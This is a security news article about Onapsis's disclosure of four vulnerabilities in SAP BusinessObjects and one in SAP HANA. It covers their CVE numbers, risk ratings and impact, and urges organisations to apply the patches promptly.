Five new vulnerabilities in two SAP products have been disclosed by Onapsis, a firm that specializes in security for business-critical applications. A senior security researcher with the company – Will Vandevanter – discovered one medium-risk and three high-risk vulnerabilities in SAP BusinessObjects, and one medium-risk vulnerability in SAP HANA.

BusinessObjects is used by organizations to perform complex performance tracking and analysis tasks, and thus often has access to enterprises’ most sensitive data. These can include product pricing, financial forecasts, internal processes, and customer data. All four of the BusinessObjects vulnerabilities were executed using interoperable CORBA communication requests.

One of the high-risk vulnerabilities (CVE-2015-2074) for BusinessObjects would allow an unauthenticated remote attacker to overwrite sensitive business data held within mission-critical systems if successfully exploited. Another high-risk vulnerability (CVE-2015-2073) would allow for unauthenticated retrieval of sensitive data stored in the platform’s file repository server. The final high-risk vulnerability (CVE-2015-2075) would allow an attacker to delete logged events from a remote auditing service. In this compromise, the attacker can clear audit events from the remote service’s queue, effectively allowing the attacker to access the platform undetected.

The remaining BusinessObjects vulnerability (CVE-2015-2076) was rated as medium risk and would permit an unauthenticated attacker to read the platform’s auditing information. Onapsis recommended that users restrict access to the feature that allows remote access to the auditing events log.

The lone medium-risk vulnerability affecting SAP HANA resulted in a reflected cross-site scripting attack that can be leveraged to view authentication information. “The SAP HANA XS Administration Tool can be used by potential attackers, allowing them to modify displayed application content without authorization, and to potentially obtain authentication information from other legitimate users,” Onapsis explained in its security advisory.

SAP was notified of all five vulnerabilities in January of 2014 and has since issued security patches to address the issues. The Onapsis advisories “strongly” recommended that users of both products download and deploy the security updates if they have not already done so.

Recent research from IDC has shown that applying updates to vulnerable enterprise applications takes an average of 18 months from when they are discovered. As for these vulnerabilities in BusinessObjects and HANA, excessive lag time between security updates being issued and the subsequent patching of affected systems unnecessarily increases an organization’s attack surface. IDC’s research illustrates this clearly, as the analyst firm’s data show that nearly three-quarters of enterprise application attacks could be prevented if the targeted system was patched for known security bugs.

“Taking steps to patch these vulnerabilities, or to implement control measures, is critical to protecting your SAP systems,” said Ezequiel Gutesman, director of research for Onapsis, in a press statement. “Recent headlines alone have shown us the consequences of not having proper security measures in place, especially when you’re dealing with systems that are housing data and processing transactions vital to the ongoing success of your business.”